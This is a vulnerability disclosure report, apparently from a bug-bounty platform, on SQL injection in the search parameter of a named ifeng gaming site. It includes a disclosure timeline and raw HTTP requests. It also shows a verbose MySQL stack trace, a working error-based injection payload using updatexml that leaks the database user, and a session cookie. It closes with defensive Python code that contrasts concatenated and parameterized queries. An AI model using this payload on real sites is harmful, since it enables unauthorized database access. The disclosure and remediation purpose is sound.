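2015-03-04: Details reported to the vendor; awaiting vendor handling
2015-03-04: Vendor confirmed; details disclosed to the vendor only
2015-03-14: Details disclosed to core white hats and experts in related fields
2015-03-24: Details disclosed to regular white hats
2015-04-03: Details disclosed to trainee white hats
2015-04-18: Details disclosed to the public

Site: sy.ifeng.com, parameter: q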

GET /service/searchgames?q=3'&pageindex=null&pagesize=null&jsoncallback=viewGameList HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://g.ifeng.com/search-list.shtml?q=3
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: sy.ifeng.com
Accept-Encoding: gzip, deflate

<h3>Exception information:</h3>
<p> <b>Message:</b> SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or en_name like '%3'%' or categorys.category_name like '%3'%') )' at line 1 </p>
<h3>Stack trace:</h3>
<pre>#0 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Statement.php(300): Zend_Db_Statement_Pdo->_execute(Array)
#1 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Statement->execute(Array)
#2 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Adapter/Pdo/Abstract.php(238): Zend_Db_Adapter_Abstract->query(' select count(D...', Array)
#3 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Adapter/Abstract.php(828): Zend_Db_Adapter_Pdo_Abstract->query(' select count(D...', Array)
#4 /data/ifengsite/htdocs/sy.ifeng.com/application/models/Game.php(459): Zend_Db_Adapter_Abstract->fetchOne(' select count(D...')
#5 /data/ifengsite/htdocs/sy.ifeng.com/application/controllers/ServiceController.php(331): Model_Game->searchGames('android', Array, 'null', 'null', 0)
#6 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Controller/Action.php(516): ServiceController->searchgamesAction()
#7 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Controller/Dispatcher/Standard.php(295): Zend_Controller_Action->dispatch('searchgamesActi...')
#8 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))
#9 /data/ifengsite/htdocs/sy.ifeng.com/application/Bootstrap.php(109): Zend_Controller_Front->dispatch()
#10 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Application.php(366): Bootstrap->run()
#11 /data/ifengsite/htdocs/sy.ifeng.com/public/index.php(20): Zend_Application->run()
#12 {main} </pre>
<h3>Request Parameters:</h3>
<pre>array(7) { ["controller"]=> string(7) "service" ["action"]=> string(11) "searchgames" ["module"]=> string(7) "default" ["q"]=> string(2) "3'" ["pageindex"]=> string(4) "null" ["pagesize"]=> string(4) "null" ["jsoncallback"]=> string(12) "viewGameList"}

Finally got a PoC working; out of five ifeng sites, I got a PoC for one.

GET /service/searchgames?q=x'and(updatexml(1,concat(0x7e,(user()),0x7e),1))or'x&pageindex=null&pagesize=null&jsoncallback=viewGameList HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://g.ifeng.com/search-list.shtml?q=3
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: sy.ifeng.com
Cookie: PHPSESSID=helc1fc5c7bvod0e0ktb282fr6; _plst[_plid_]=2892439417; _plst[others][_pllv_]=13
Accept-Encoding: gzip, deflate

Date: Tue, 03 Mar 2015 12:07:34 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"; "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>
<html xmlns="http://www.w3.org/1999/xhtml">
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>å¤å°ç½æ¸¸æä¸å¿èè¿ç³»ç»</title> </head>
<body> <h1>An error occurred</h1> <h2>Application error</h2>
<h3>Exception information:</h3>
<p> <b>Message:</b> SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '[email protected]~' </p>
<h3>Stack trace:</

Severity: High
Vulnerability Rank: 10
Confirmed: 2015-03-04 13:36
Thank you very much; we are handling it.
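
The MySQL error above shows q landing unescaped inside two LIKE '%...%' patterns, and the error page returns the exception and stack trace to the client. As an added example (not code from this report or from the site), the same query shape is built below by string concatenation and then as a parameterized query, using Python's sqlite3 with an in-memory database in place of the site's MySQL; the games table, its rows and all function names are assumptions.

```python
import sqlite3

# Constructed stand-in data: in-memory SQLite replaces the site's MySQL.
# The table name "games" is an assumption; en_name and
# categorys.category_name are the columns visible in the error message.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE categorys (id INTEGER PRIMARY KEY, category_name TEXT);
        CREATE TABLE games (id INTEGER PRIMARY KEY, en_name TEXT, category_id INTEGER);
        INSERT INTO categorys VALUES (1, 'puzzle'), (2, 'racing');
        INSERT INTO games VALUES (1, '3 in a row', 1), (2, 'road 100%', 2), (3, 'chess', 1);
    """)
    return db

BASE = ("SELECT COUNT(DISTINCT games.id) FROM games "
        "JOIN categorys ON categorys.id = games.category_id WHERE ")

def count_unsafe(db, q):
    # "Before": q is pasted into the LIKE patterns, so a single quote ends
    # the string literal and the rest of q is parsed as SQL.
    sql = BASE + f"en_name LIKE '%{q}%' OR categorys.category_name LIKE '%{q}%'"
    return db.execute(sql).fetchone()[0]

def like_pattern(q):
    # Escape LIKE metacharacters so user input matches literally.
    for ch in ("\\", "%", "_"):
        q = q.replace(ch, "\\" + ch)
    return f"%{q}%"

def count_safe(db, q):
    # "After": q travels as a bound parameter and never reaches the SQL parser.
    sql = BASE + ("en_name LIKE ? ESCAPE '\\' "
                  "OR categorys.category_name LIKE ? ESCAPE '\\'")
    p = like_pattern(q)
    return db.execute(sql, (p, p)).fetchone()[0]

def search(db, q):
    # Return a generic error to the client; the detail belongs in server logs,
    # not in the response body with a stack trace and file paths.
    try:
        return {"ok": True, "count": count_safe(db, q)}
    except sqlite3.Error:
        return {"ok": False, "error": "search unavailable"}
```

With q=3' the concatenated query fails to parse, which is the condition the first request exposed, while the bound version treats the quote as an ordinary character to search for.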